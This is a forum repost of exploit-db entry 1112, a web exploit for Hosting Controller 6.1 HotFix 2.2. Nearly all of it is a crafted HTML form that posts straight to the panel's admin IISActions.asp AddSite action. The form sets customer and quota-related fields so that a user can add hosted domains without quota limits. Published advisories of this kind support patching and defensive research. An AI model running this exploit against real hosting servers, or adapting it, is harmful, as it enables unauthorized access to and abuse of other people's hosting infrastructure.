Exploit Hosting Controller 6.1 HotFix 2.2 - Add Domain without Quota

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1112
Проверка EDB
  1. Пройдено
Автор
SOROUSH DALILI
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
N/A
Дата публикации
2005-07-18
Код:
<!-- Change [url] /str0ke -->

<form method="post" name="addform" action="http://[url]/admin/iis/IISActions.asp?ActionType=AddSite&hostcustid=1&hostingplans=1">
<table>
<tr class="looplistingDark">
<td width="19%" class="Contents">Website Name : </td>
<td width="73%" class="contents">
<input type="text" size="25" name="fServerComment">
</td></tr><td>
ThirdLevelDomainCheck: </td><td><input type="TEXT" name="ThirdLevelDomainCheck" value="FALSE"></td>
</tr>WebUsers: <input type="TEXT" name="WebUsers" ID="WebUsers" value="YourUsername"><br>
hostcustid: <input type="TEXT" name="hostcustid" ID="hostcustid" value="1"><tr>
<td height="0" colspan="2">
<table width="100%" cellspacing="0" cellpadding="0">
<tr class="LoopListingdark">
<td width="19%" class="contents"> Website Type : </td>
<td width="73%" class="contents"><select name="IPLessCheckBox" id="IPLessCheckBox"><option value="NO">IP Based Domain</option><option value="YES">
       Name Based Domain
      </option></select></td>
</tr>
</table>
<div id="DivIPBased" style="font:10px bold;Visibility:Visible">
<table width="100%" ID="Table1" cellspacing="1" cellpadding="0" border="0" height="100%">IPAddress : <input type="TEXT" name="fIPAddress" value="127.0.0.1" ID="TEXT1">PortNo :<input type="TEXT" size="30" name="fPortNo" value="80" ID="TEXT2">IPLessDomain: <input type="TEXT" name="fIPLessDomain" value="FALSE" ID="TEXT3"></table></div>
</td>
</tr>
<tr>
<td colspan="2" align="left">
<table width="100%" cellspacing="0" cellpadding="0">
<tr class="looplistingDark">
<td width="19%" class="contents"> Mail Access : </td>
<td width="73%" class="contents"><input type="checkbox" name="mailaccess" value="YES" ID="mailaccess" checked> Enable
   </td>
</tr>
</table>
<div id="DivMailAccess" style="font:10px bold;Visibility:Visible">
<table class="bg2" width="100%" border="0" cellspacing="1">
<tr class="looplistingDark">
<td width="19%" class="contents">  Mail Server : </td>
<td width="73%" class="contents"><select id="Select3" name="MailServerType"><option>IMail Server</option>
<option>Merak Mail Server</option>
<option>MailEnable Server</option></select></td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents"> Mail Password : </td>
<td width="73%" class="contents"><input type="password" id="mailpassword" name="mailpassword"></td>
</tr>
</table>
</div>
</td>
</tr><tr><td>SiteType: </td><td><input type="TEXT" name="SiteType" value="www" ID="TEXT4"><tr class="looplistingDark">
<td width="19%" class="contents" colspan="2"> </td>
</tr>
<tr>
<td colspan="2" align="left">
<div id="DivAdvSettings" style="font:10px bold;Visibility:Visible">
<table width="100%" border="0" ID="Table3" cellspacing="1" cellpadding="1">
<tr class="looplistingDark">
<td width="19%" class="contents"> Allow Anonymous : </td>
<td width="73%" class="contents"><input type="radio" name="AllowAnon" value="NO" ID="Radio1">No
        <input type="radio" name="AllowAnon" value="YES" ID="Radio2" checked>Yes
       </td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents"> Access Permissions : </td>
<td width="73%" class="contents"><input type="checkbox" name="Read" value="YES" ID="Checkbox1" checked>Read
        <input type="checkbox" name="Write" value="YES" ID="Checkbox2">Write
        <input type="checkbox" name="Script" value="YES" ID="Checkbox3" checked>Script
       </td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents"> </td>
<td width="73%" class="contents"><input type="checkbox" name="Execute" value="YES" ID="Checkbox4">Execute (Includes Script)
       </td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents"> </td>
<td width="73%" class="contents"><input type="checkbox" name="DirBrowsing" value="YES" ID="Checkbox5">Directory Browsing Allowed
       </td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents"> </td>
<td width="73%" class="contents"><input type="checkbox" name="FrontPageWeb" value="YES" ID="Checkbox6"> Install FrontPage Extensions
       </td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents">Enable Default Document : </td>
<td width="73%" class="contents"><input type="Checkbox" name="enabledefaultdoc" value="YES" ID="Checkbox7" checked></td>
</tr>
<tr class="looplistingDark">
<td width="19%" class="contents"> </td>
<td width="73%" class="contents"><input type="Text" name="defaultdoc" value="Default.htm,default.asp,index.htm,index.html,index.cfm,index.asp,default.aspx,index.aspx" size="60" ID="Text1"></td>
</tr>
</table>
</div>
</td>
</tr>
<tr class="btnbg">
<td width="73%" align="right" class="btnbg" colspan="2">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td><input type="submit" class="butn" name="Add Site2" value="  Next  >>  "> </td>
</tr>
</table>
</td>
</tr>
</table>
</form>

# milw0rm.com [2005-07-18]
 
Источник
www.exploit-db.com

Похожие темы